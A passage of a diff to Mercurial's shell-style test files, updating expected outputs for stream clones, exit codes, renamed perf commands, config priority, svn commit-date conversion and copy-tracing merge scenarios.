http://localhost:$HGPORT phase-no-publish streaming all changes - 1034 files to transfer, 96.7 KB of data - transferred 96.7 KB in * seconds (* */sec) (glob) + 1034 files to transfer, 96.7 KB of data (no-zstd !) + transferred 96.7 KB in * seconds (* */sec) (glob) (no-zstd !) + 1034 files to transfer, 93.9 KB of data (zstd !) + transferred 93.9 KB in * seconds (* */sec) (glob) (zstd !) updating to branch default 1025 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg -R phase-no-publish phase -r 'all()' @@ -563,8 +650,10 @@ $ hg clone -U --stream http://localhost:$HGPORT with-obsolescence streaming all changes - 1035 files to transfer, 97.1 KB of data - transferred 97.1 KB in * seconds (* */sec) (glob) + 1035 files to transfer, 97.1 KB of data (no-zstd !) + transferred 97.1 KB in * seconds (* */sec) (glob) (no-zstd !) + 1035 files to transfer, 94.3 KB of data (zstd !) + transferred 94.3 KB in * seconds (* */sec) (glob) (zstd !) $ hg -R with-obsolescence log -T '{rev}: {phase}\n' 1: draft 0: draft @@ -575,7 +664,7 @@ streaming all changes remote: abort: server has obsolescence markers, but client cannot receive them via stream clone abort: pull failed on remote - [255] + [100] $ killdaemons.py diff --git a/tests/test-clonebundles.t b/tests/test-clonebundles.t --- a/tests/test-clonebundles.t +++ b/tests/test-clonebundles.t @@ -279,7 +279,8 @@ $ hg -R server debugcreatestreamclonebundle packed.hg writing 613 bytes for 4 files - bundle requirements: generaldelta, revlogv1, sparserevlog + bundle requirements: generaldelta, revlogv1, sparserevlog (no-rust !) + bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog (rust !) No bundle spec should work @@ -589,9 +590,7 @@ bundle2-input-part: "listkeys" (params: 1 mandatory) supported bundle2-input-part: "phase-heads" supported bundle2-input-part: total payload size 24 - bundle2-input-part: "cache:rev-branch-cache" (advisory) supported - bundle2-input-part: total payload size 59 - bundle2-input-bundle: 4 parts total + bundle2-input-bundle: 3 parts total checking for updated bookmarks updating the branch cache added 2 changesets with 2 changes to 2 files diff --git a/tests/test-commandserver.t b/tests/test-commandserver.t --- a/tests/test-commandserver.t +++ b/tests/test-commandserver.t @@ -522,7 +522,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] *** runcommand verify checking changesets checking manifests @@ -1013,7 +1013,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] *** runcommand log *** runcommand verify -q @@ -1057,7 +1057,7 @@ transaction abort! rollback completed abort: pretxncommit hook exited with status 1 - [255] + [40] *** runcommand log 0 bar (bar) *** runcommand verify -q diff --git a/tests/test-commit-amend.t b/tests/test-commit-amend.t --- a/tests/test-commit-amend.t +++ b/tests/test-commit-amend.t @@ -209,7 +209,7 @@ transaction abort! rollback completed abort: pretxncommit.test-saving-last-message hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt message given from command line (no-eol) @@ -234,7 +234,7 @@ transaction abort! rollback completed abort: pretxncommit.test-saving-last-message hook exited with status 1 - [255] + [40] $ cat .hg/last-message.txt another precious commit message diff --git a/tests/test-completion.t b/tests/test-completion.t --- a/tests/test-completion.t +++ b/tests/test-completion.t @@ -38,6 +38,7 @@ paths phase pull + purge push recover remove @@ -129,6 +130,7 @@ debugrevspec debugserve debugsetparents + debugshell debugsidedata debugssl debugstrip @@ -270,7 +272,7 @@ debugbuilddag: mergeable-file, overwritten-file, new-file debugbundle: all, part-type, spec debugcapabilities: - debugchangedfiles: + debugchangedfiles: compute debugcheckstate: debugcolor: style debugcommands: @@ -281,7 +283,7 @@ debugdate: extended debugdeltachain: changelog, manifest, dir, template debugdirstate: nodates, dates, datesort - debugdiscovery: old, nonheads, rev, seed, ssh, remotecmd, insecure + debugdiscovery: old, nonheads, rev, seed, local-as-revs, remote-as-revs, ssh, remotecmd, insecure, template debugdownload: output debugextensions: template debugfileset: rev, all-files, show-matcher, show-stage @@ -318,6 +320,7 @@ debugrevspec: optimize, show-revs, show-set, show-stage, no-optimized, verify-optimized debugserve: sshstdio, logiofd, logiofile debugsetparents: + debugshell: debugsidedata: changelog, manifest, dir debugssl: debugstrip: rev, force, no-backup, nobackup, , keep, bookmark, soft @@ -354,10 +357,11 @@ paths: template phase: public, draft, secret, force, rev pull: update, force, confirm, rev, bookmark, branch, ssh, remotecmd, insecure + purge: abort-on-err, all, ignored, dirs, files, print, print0, confirm, include, exclude push: force, rev, bookmark, all-bookmarks, branch, new-branch, pushvars, publish, ssh, remotecmd, insecure recover: verify remove: after, force, subrepos, include, exclude, dry-run - rename: after, at-rev, force, include, exclude, dry-run + rename: forget, after, at-rev, force, include, exclude, dry-run resolve: all, list, mark, unmark, no-status, re-merge, tool, include, exclude, template revert: all, date, rev, no-backup, interactive, include, exclude, dry-run rollback: dry-run, force diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -1,3 +1,17 @@ +Windows needs ';' as a file separator in an environment variable, and MSYS +doesn't automatically convert it in every case. + +#if windows + $ path_list_var() { + > echo $1 | sed 's/:/;/' + > } +#else + $ path_list_var() { + > echo $1 + > } +#endif + + hide outer repo $ hg init @@ -388,3 +402,114 @@ > done $ HGRCPATH=configs hg config section.key 99 + +Configuration priority +====================== + +setup necessary file + + $ cat > file-A.rc << EOF + > [config-test] + > basic = value-A + > pre-include= value-A + > %include ./included.rc + > post-include= value-A + > [command-templates] + > log = "value-A\n" + > EOF + + $ cat > file-B.rc << EOF + > [config-test] + > basic = value-B + > [ui] + > logtemplate = "value-B\n" + > EOF + + + $ cat > included.rc << EOF + > [config-test] + > pre-include= value-included + > post-include= value-included + > EOF + + $ cat > file-C.rc << EOF + > %include ./included-alias-C.rc + > [ui] + > logtemplate = "value-C\n" + > EOF + + $ cat > included-alias-C.rc << EOF + > [command-templates] + > log = "value-included\n" + > EOF + + + $ cat > file-D.rc << EOF + > [command-templates] + > log = "value-D\n" + > %include ./included-alias-D.rc + > EOF + + $ cat > included-alias-D.rc << EOF + > [ui] + > logtemplate = "value-included\n" + > EOF + +Simple order checking +--------------------- + +If file B is read after file A, value from B overwrite value from A. + + $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg config config-test.basic + value-B + +Ordering from include +--------------------- + +value from an include overwrite value defined before the include, but not the one defined after the include + + $ HGRCPATH="file-A.rc" hg config config-test.pre-include + value-included + $ HGRCPATH="file-A.rc" hg config config-test.post-include + value-A + +command line override +--------------------- + + $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg config config-test.basic --config config-test.basic=value-CLI + value-CLI + +Alias ordering +-------------- + +The official config is now `command-templates.log`, the historical +`ui.logtemplate` is a valid alternative for it. + +When both are defined, The config value read the last "win", this should keep +being true if the config have other alias. In other word, the config value read +earlier will be considered "lower level" and the config read later would be +considered "higher level". And higher level values wins. + + $ HGRCPATH="file-A.rc" hg log -r . + value-A + $ HGRCPATH="file-B.rc" hg log -r . + value-B + $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg log -r . + value-B + +Alias and include +----------------- + +The pre/post include priority should also apply when tie-breaking alternatives. +See the case above for details about the two config options used. + + $ HGRCPATH="file-C.rc" hg log -r . + value-C + $ HGRCPATH="file-D.rc" hg log -r . + value-included + +command line override +--------------------- + + $ HGRCPATH=`path_list_var "file-A.rc:file-B.rc"` hg log -r . --config ui.logtemplate="value-CLI\n" + value-CLI diff --git a/tests/test-contrib-perf.t b/tests/test-contrib-perf.t --- a/tests/test-contrib-perf.t +++ b/tests/test-contrib-perf.t @@ -78,111 +78,137 @@ list of commands: - perfaddremove + perf::addremove + (no help text available) + perf::ancestors (no help text available) - perfancestors + perf::ancestorset (no help text available) - perfancestorset + perf::annotate (no help text available) - perfannotate (no help text available) - perfbdiff benchmark a bdiff between revisions - perfbookmarks + perf::bdiff benchmark a bdiff between revisions + perf::bookmarks benchmark parsing bookmarks from disk to memory - perfbranchmap + perf::branchmap benchmark the update of a branchmap - perfbranchmapload + perf::branchmapload benchmark reading the branchmap - perfbranchmapupdate + perf::branchmapupdate benchmark branchmap update from for <base> revs to <target> revs - perfbundleread + perf::bundleread Benchmark reading of bundle files. - perfcca (no help text available) - perfchangegroupchangelog + perf::cca (no help text available) + perf::changegroupchangelog Benchmark producing a changelog group for a changegroup. - perfchangeset + perf::changeset + (no help text available) + perf::ctxfiles (no help text available) - perfctxfiles (no help text available) - perfdiffwd Profile diff of working directory changes - perfdirfoldmap + perf::diffwd Profile diff of working directory changes + perf::dirfoldmap benchmap a 'dirstate._map.dirfoldmap.get()' request - perfdirs (no help text available) - perfdirstate benchmap the time of various distate operations - perfdirstatedirs + perf::dirs (no help text available) + perf::dirstate + benchmap the time of various distate operations + perf::dirstatedirs benchmap a 'dirstate.hasdir' call from an empty 'dirs' cache - perfdirstatefoldmap + perf::dirstatefoldmap benchmap a 'dirstate._map.filefoldmap.get()' request - perfdirstatewrite + perf::dirstatewrite benchmap the time it take to write a dirstate on disk - perfdiscovery + perf::discovery benchmark discovery between local repo and the peer at given path - perffncacheencode + perf::fncacheencode (no help text available) - perffncacheload + perf::fncacheload (no help text available) - perffncachewrite + perf::fncachewrite (no help text available) - perfheads benchmark the computation of a changelog heads - perfhelper-mergecopies + perf::heads benchmark the computation of a changelog heads + perf::helper-mergecopies find statistics about potential parameters for 'perfmergecopies' - perfhelper-pathcopies + perf::helper-pathcopies find statistic about potential parameters for the 'perftracecopies' - perfignore benchmark operation related to computing ignore - perfindex benchmark index creation time followed by a lookup - perflinelogedits + perf::ignore benchmark operation related to computing ignore + perf::index benchmark index creation time followed by a lookup + perf::linelogedits (no help text available) - perfloadmarkers + perf::loadmarkers benchmark the time to parse the on-disk markers for a repo - perflog (no help text available) - perflookup (no help text available) - perflrucachedict + perf::log (no help text available) + perf::lookup (no help text available) + perf::lrucachedict (no help text available) - perfmanifest benchmark the time to read a manifest from disk and return a + perf::manifest + benchmark the time to read a manifest from disk and return a usable - perfmergecalculate + perf::mergecalculate (no help text available) - perfmergecopies + perf::mergecopies measure runtime of 'copies.mergecopies' - perfmoonwalk benchmark walking the changelog backwards - perfnodelookup + perf::moonwalk + benchmark walking the changelog backwards + perf::nodelookup (no help text available) - perfnodemap benchmark the time necessary to look up revision from a cold + perf::nodemap + benchmark the time necessary to look up revision from a cold nodemap - perfparents benchmark the time necessary to fetch one changeset's parents. - perfpathcopies + perf::parents + benchmark the time necessary to fetch one changeset's parents. + perf::pathcopies benchmark the copy tracing logic - perfphases benchmark phasesets computation - perfphasesremote + perf::phases benchmark phasesets computation + perf::phasesremote benchmark time needed to analyse phases of the remote server - perfprogress printing of progress bars - perfrawfiles (no help text available) - perfrevlogchunks + perf::progress + printing of progress bars + perf::rawfiles + (no help text available) + perf::revlogchunks Benchmark operations on revlog chunks. - perfrevlogindex + perf::revlogindex Benchmark operations against a revlog index. - perfrevlogrevision + perf::revlogrevision Benchmark obtaining a revlog revision. - perfrevlogrevisions + perf::revlogrevisions Benchmark reading a series of revisions from a revlog. - perfrevlogwrite + perf::revlogwrite Benchmark writing a series of revisions to a revlog. - perfrevrange (no help text available) - perfrevset benchmark the execution time of a revset - perfstartup (no help text available) - perfstatus benchmark the performance of a single status call - perftags (no help text available) - perftemplating + perf::revrange + (no help text available) + perf::revset benchmark the execution time of a revset + perf::startup + (no help text available) + perf::status benchmark the performance of a single status call + perf::tags (no help text available) + perf::templating test the rendering time of a given template - perfunidiff benchmark a unified diff between revisions - perfvolatilesets + perf::unidiff + benchmark a unified diff between revisions + perf::volatilesets benchmark the computation of various volatile set - perfwalk (no help text available) - perfwrite microbenchmark ui.write (and others) + perf::walk (no help text available) + perf::write microbenchmark ui.write (and others) (use 'hg help -v perf' to show built-in aliases and global options) + + $ hg help perfaddremove + hg perf::addremove + + aliases: perfaddremove + + (no help text available) + + options: + + -T --template TEMPLATE display with template + + (some details hidden, use --verbose to show complete help) + $ hg perfaddremove $ hg perfancestors $ hg perfancestorset 2 diff --git a/tests/test-convert-cvs.t b/tests/test-convert-cvs.t --- a/tests/test-convert-cvs.t +++ b/tests/test-convert-cvs.t @@ -521,7 +521,7 @@ |cp932 |\x82\xa0 | x x o | $ mkdir -p cvsrepo/transcoding - $ python <<EOF + $ "$PYTHON" <<EOF > fp = open('cvsrepo/transcoding/file,v', 'wb') > fp.write((b''' > head 1.4; diff --git a/tests/test-convert-filemap.t b/tests/test-convert-filemap.t --- a/tests/test-convert-filemap.t +++ b/tests/test-convert-filemap.t @@ -292,12 +292,12 @@ $ rm -rf source/.hg/store/data/dir/file4 #endif $ hg -q convert --filemap renames.fmap --datesort source dummydest - abort: data/dir/file3.i@e96dce0bc6a2: no match found (reporevlogstore !) + abort: data/dir/file3.i@e96dce0bc6a217656a3a410e5e6bec2c4f42bf7c: no match found (reporevlogstore !) abort: data/dir/file3/index@e96dce0bc6a2: no node (reposimplestore !) [50] $ hg -q convert --filemap renames.fmap --datesort --config convert.hg.ignoreerrors=1 source renames.repo - ignoring: data/dir/file3.i@e96dce0bc6a2: no match found (reporevlogstore !) - ignoring: data/dir/file4.i@6edd55f559cd: no match found (reporevlogstore !) + ignoring: data/dir/file3.i@e96dce0bc6a217656a3a410e5e6bec2c4f42bf7c: no match found (reporevlogstore !) + ignoring: data/dir/file4.i@6edd55f559cdce67132b12ca09e09cee08b60442: no match found (reporevlogstore !) ignoring: data/dir/file3/index@e96dce0bc6a2: no node (reposimplestore !) ignoring: data/dir/file4/index@6edd55f559cd: no node (reposimplestore !) $ hg up -q -R renames.repo diff --git a/tests/test-convert-hg-source.t b/tests/test-convert-hg-source.t --- a/tests/test-convert-hg-source.t +++ b/tests/test-convert-hg-source.t @@ -182,7 +182,7 @@ sorting... converting... 4 init - ignoring: data/b.i@1e88685f5dde: no match found (reporevlogstore !) + ignoring: data/b.i@1e88685f5ddec574a34c70af492f95b6debc8741: no match found (reporevlogstore !) ignoring: data/b/index@1e88685f5dde: no node (reposimplestore !) 3 changeall 2 changebagain diff --git a/tests/test-convert-svn-sink.t b/tests/test-convert-svn-sink.t --- a/tests/test-convert-svn-sink.t +++ b/tests/test-convert-svn-sink.t @@ -54,10 +54,12 @@ 2 2 test a revision: 2 author: test + date: * (glob) msg: modify a file M /a revision: 1 author: test + date: * (glob) msg: add a file A /a A /d1 @@ -95,6 +97,7 @@ 3 3 test b revision: 3 author: test + date: * (glob) msg: rename a file D /a A /b (from /a@2) @@ -131,6 +134,7 @@ 4 4 test c revision: 4 author: test + date: * (glob) msg: copy a file A /c (from /b@3) $ ls a a-hg-wc @@ -167,6 +171,7 @@ 5 5 test . revision: 5 author: test + date: * (glob) msg: remove a file D /b $ ls a a-hg-wc @@ -209,6 +214,7 @@ 6 6 test c revision: 6 author: test + date: * (glob) msg: make a file executable M /c #if execbit @@ -247,6 +253,7 @@ 8 8 test newlink revision: 8 author: test + date: * (glob) msg: move symlink D /link A /newlink (from /link@7) @@ -278,6 +285,7 @@ 7 7 test f revision: 7 author: test + date: * (glob) msg: f D /c A /d @@ -315,6 +323,7 @@ 1 1 test d1/a revision: 1 author: test + date: * (glob) msg: add executable file in new directory A /d1 A /d1/a @@ -343,6 +352,7 @@ 2 2 test d2/a revision: 2 author: test + date: * (glob) msg: copy file to new directory A /d2 A /d2/a (from /d1/a@1) @@ -416,21 +426,25 @@ 4 4 test right-2 revision: 4 author: test + date: * (glob) msg: merge A /right-1 A /right-2 revision: 3 author: test + date: * (glob) msg: left-2 M /b A /left-2 revision: 2 author: test + date: * (glob) msg: left-1 M /b A /left-1 revision: 1 author: test + date: * (glob) msg: base A /b @@ -459,10 +473,12 @@ 2 2 test .hgtags revision: 2 author: test + date: * (glob) msg: Tagged as v1.0 A /.hgtags revision: 1 author: test + date: * (glob) msg: Add file a A /a $ rm -rf a a-hg a-hg-wc @@ -494,10 +510,12 @@ 2 2 test exec revision: 2 author: test + date: * (glob) msg: remove executable bit M /exec revision: 1 author: test + date: * (glob) msg: create executable A /exec $ test ! -x a-hg-wc/exec @@ -540,11 +558,77 @@ 2 2 test b revision: 2 author: test + date: * (glob) msg: Another change A /b revision: 1 author: test + date: * (glob) msg: Some change A /a $ rm -rf a a-hg a-hg-wc + +Commit dates convertion + + $ hg init a + + $ echo a >> a/a + $ hg add a + adding a/a + $ hg --cwd a ci -d '1 0' -A -m 'Change 1' + + $ echo a >> a/a + $ hg --cwd a ci -d '2 0' -m 'Change 2' + + $ echo a >> a/a + $ hg --cwd a ci -d '2 0' -m 'Change at the same time' + + $ echo a >> a/a + $ hg --cwd a ci -d '1 0' -m 'Change in the past' + + $ echo a >> a/a + $ hg --cwd a ci -d '3 0' -m 'Change in the future' + + $ hg convert --config convert.svn.dangerous-set-commit-dates=true -d svn a + assuming destination a-hg + initializing svn repository 'a-hg' + initializing svn working copy 'a-hg-wc' + scanning source... + sorting... + converting... + 4 Change 1 + 3 Change 2 + 2 Change at the same time + 1 Change in the past + 0 Change in the future + $ svnupanddisplay a-hg-wc 0 + 5 5 test . + 5 5 test a + revision: 5 + author: test + date: 1970-01-01T00:00:03.000000Z + msg: Change in the future + M /a + revision: 4 + author: test + date: 1970-01-01T00:00:01.000000Z + msg: Change in the past + M /a + revision: 3 + author: test + date: 1970-01-01T00:00:02.000000Z + msg: Change at the same time + M /a + revision: 2 + author: test + date: 1970-01-01T00:00:02.000000Z + msg: Change 2 + M /a + revision: 1 + author: test + date: 1970-01-01T00:00:01.000000Z + msg: Change 1 + A /a + + $ rm -rf a a-hg a-hg-wc diff --git a/tests/test-convert.t b/tests/test-convert.t --- a/tests/test-convert.t +++ b/tests/test-convert.t @@ -388,6 +388,23 @@ does not convert tags from the source repo to the target repo. The default is False. + Subversion Destination + ###################### + + Original commit dates are not preserved by default. + + convert.svn.dangerous-set-commit-dates + preserve original commit dates, forcefully setting + "svn:date" revision properties. This option is DANGEROUS and + may break some subversion functionality for the resulting + repository (e.g. filtering revisions with date ranges in + "svn log"), as original commit dates are not guaranteed to + be monotonically increasing. + + For commit dates setting to work destination repository must have "pre- + revprop-change" hook configured to allow setting of "svn:date" revision + properties. See Subversion documentation for more details. + options ([+] can be repeated): -s --source-type TYPE source repository type diff --git a/tests/test-copies-chain-merge.t b/tests/test-copies-chain-merge.t --- a/tests/test-copies-chain-merge.t +++ b/tests/test-copies-chain-merge.t @@ -1,4 +1,4 @@ -#testcases filelog compatibility changeset sidedata upgraded +#testcases filelog compatibility changeset sidedata upgraded upgraded-parallel ===================================================== Test Copy tracing for chain of copies involving merge @@ -14,11 +14,24 @@ use git diff to see rename + $ cat << EOF >> ./no-linkrev + > #!$PYTHON + > # filter out linkrev part of the debugindex command + > import sys + > for line in sys.stdin: + > if " linkrev " in line: + > print(line.rstrip()) + > else: + > l = "%s *%s" % (line[:6], line[14:].rstrip()) + > print(l) + > EOF + $ chmod +x no-linkrev + $ cat << EOF >> $HGRCPATH > [diff] > git=yes > [command-templates] - > log={rev} {desc}\n + > log={desc}\n > EOF #if compatibility @@ -45,28 +58,45 @@ #endif + $ cat > same-content.txt << EOF + > Here is some content that will be the same accros multiple file. + > + > This is done on purpose so that we end up in some merge situation, were the + > resulting content is the same as in the parent(s), but a new filenodes still + > need to be created to record some file history information (especially + > about copies). + > EOF + $ hg init repo-chain $ cd repo-chain Add some linear rename initialy - $ echo a > a - $ echo b > b - $ echo h > h - $ hg ci -Am 'i-0 initial commit: a b h' + $ cp ../same-content.txt a + $ cp ../same-content.txt b + $ cp ../same-content.txt h + $ echo "original content for P" > p + $ echo "original content for Q" > q + $ echo "original content for R" > r + $ hg ci -Am 'i-0 initial commit: a b h p q r' adding a adding b adding h + adding p + adding q + adding r $ hg mv a c - $ hg ci -Am 'i-1: a -move-> c' + $ hg mv p s + $ hg ci -Am 'i-1: a -move-> c, p -move-> s' $ hg mv c d - $ hg ci -Am 'i-2: c -move-> d' + $ hg mv s t + $ hg ci -Am 'i-2: c -move-> d, s -move-> t' $ hg log -G - @ 2 i-2: c -move-> d + @ i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r And having another branch with renames on the other side @@ -76,15 +106,15 @@ $ hg mv e f $ hg ci -Am 'a-2: e -move-> f' $ hg log -G --rev '::.' - @ 4 a-2: e -move-> f + @ a-2: e -move-> f | - o 3 a-1: d -move-> e + o a-1: d -move-> e | - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Have a branching with nothing on one side @@ -95,13 +125,13 @@ $ hg ci -m 'b-1: b update' created new head $ hg log -G --rev '::.' - @ 5 b-1: b update + @ b-1: b update | - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Create a branch that delete a file previous renamed @@ -112,13 +142,13 @@ $ hg ci -m 'c-1 delete d' created new head $ hg log -G --rev '::.' - @ 6 c-1 delete d + @ c-1 delete d | - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Create a branch that delete a file previous renamed and recreate it @@ -132,15 +162,15 @@ $ hg add d $ hg ci -m 'd-2 re-add d' $ hg log -G --rev '::.' - @ 8 d-2 re-add d + @ d-2 re-add d | - o 7 d-1 delete d + o d-1 delete d | - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Having another branch renaming a different file to the same filename as another @@ -153,16 +183,61 @@ $ hg mv g f $ hg ci -m 'e-2 g -move-> f' $ hg log -G --rev '::.' - @ 10 e-2 g -move-> f + @ e-2 g -move-> f + | + o e-1 b -move-> g + | + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s | - o 9 e-1 b -move-> g + o i-0 initial commit: a b h p q r + + $ hg up -q null + +Having a branch similar to the 'a' one, but moving the 'p' file around. + + $ hg up 'desc("i-2")' + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg mv t u + $ hg ci -Am 'p-1: t -move-> u' + created new head + $ hg mv u v + $ hg ci -Am 'p-2: u -move-> v' + $ hg log -G --rev '::.' + @ p-2: u -move-> v + | + o p-1: t -move-> u + | + o i-2: c -move-> d, s -move-> t | - o 2 i-2: c -move-> d + o i-1: a -move-> c, p -move-> s | - o 1 i-1: a -move-> c + o i-0 initial commit: a b h p q r + + $ hg up -q null + +Having another branch renaming a different file to the same filename as another + + $ hg up 'desc("i-2")' + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg mv r w + $ hg ci -m 'q-1 r -move-> w' + created new head + $ hg mv w v + $ hg ci -m 'q-2 w -move-> v' + $ hg log -G --rev '::.' + @ q-2 w -move-> v | - o 0 i-0 initial commit: a b h + o q-1 r -move-> w + | + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + $ hg up -q null Setup all merge =============== @@ -176,35 +251,37 @@ - rename on one side - unrelated change on the other side + $ case_desc="simple merge - A side: multiple renames, B side: unrelated update" + $ hg up 'desc("b-1")' - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("a-2")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mBAm-0 simple merge - one way' + $ hg ci -m "mBAm-0 $case_desc - one way" $ hg up 'desc("a-2")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mABm-0 simple merge - the other way' + $ hg ci -m "mABm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mABm")+desc("mBAm"))' - @ 12 mABm-0 simple merge - the other way + @ mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way |\ - +---o 11 mBAm-0 simple merge - one way + +---o mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way | |/ - | o 5 b-1: b update + | o b-1: b update | | - o | 4 a-2: e -move-> f + o | a-2: e -move-> f | | - o | 3 a-1: d -move-> e + o | a-1: d -move-> e |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r @@ -216,12 +293,14 @@ - one deleting the change and recreate an unrelated file after the merge + $ case_desc="simple merge - C side: delete a file with copies history , B side: unrelated update" + $ hg up 'desc("b-1")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("c-1")' 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mBCm-0 simple merge - one way' + $ hg ci -m "mBCm-0 $case_desc - one way" $ echo bar > d $ hg add d $ hg ci -m 'mBCm-1 re-add d' @@ -230,29 +309,29 @@ $ hg merge 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mCBm-0 simple merge - the other way' + $ hg ci -m "mCBm-0 $case_desc - the other way" created new head $ echo bar > d $ hg add d $ hg ci -m 'mCBm-1 re-add d' $ hg log -G --rev '::(desc("mCBm")+desc("mBCm"))' - @ 16 mCBm-1 re-add d + @ mCBm-1 re-add d | - o 15 mCBm-0 simple merge - the other way + o mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way |\ - | | o 14 mBCm-1 re-add d + | | o mBCm-1 re-add d | | | - +---o 13 mBCm-0 simple merge - one way + +---o mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way | |/ - | o 6 c-1 delete d + | o c-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Comparing with a merge re-adding the file afterward @@ -262,84 +341,139 @@ - one with change to an unrelated file - one deleting and recreating the change + $ case_desc="simple merge - B side: unrelated update, D side: delete and recreate a file (with different content)" + $ hg up 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("d-2")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mBDm-0 simple merge - one way' + $ hg ci -m "mBDm-0 $case_desc - one way" $ hg up 'desc("d-2")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mDBm-0 simple merge - the other way' + $ hg ci -m "mDBm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mDBm")+desc("mBDm"))' - @ 18 mDBm-0 simple merge - the other way + @ mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way |\ - +---o 17 mBDm-0 simple merge - one way + +---o mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way | |/ - | o 8 d-2 re-add d + | o d-2 re-add d | | - | o 7 d-1 delete d + | o d-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r Comparing with a merge with colliding rename -------------------------------------------- +Subcase: new copy information on both side +`````````````````````````````````````````` + - the "e-" branch renaming b to f (through 'g') - the "a-" branch renaming d to f (through e) + $ case_desc="merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f)" + $ hg up 'desc("a-2")' 2 files updated, 0 files merged, 1 files removed, 0 files unresolved - $ hg merge 'desc("e-2")' --tool :union - merging f - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("e-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) - $ hg ci -m 'mAEm-0 simple merge - one way' + $ hg ci -m "mAEm-0 $case_desc - one way" $ hg up 'desc("e-2")' - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved - $ hg merge 'desc("a-2")' --tool :union - merging f - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("a-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) - $ hg ci -m 'mEAm-0 simple merge - the other way' + $ hg ci -m "mEAm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))' - @ 20 mEAm-0 simple merge - the other way + @ mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way |\ - +---o 19 mAEm-0 simple merge - one way + +---o mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way | |/ - | o 10 e-2 g -move-> f + | o e-2 g -move-> f | | - | o 9 e-1 b -move-> g + | o e-1 b 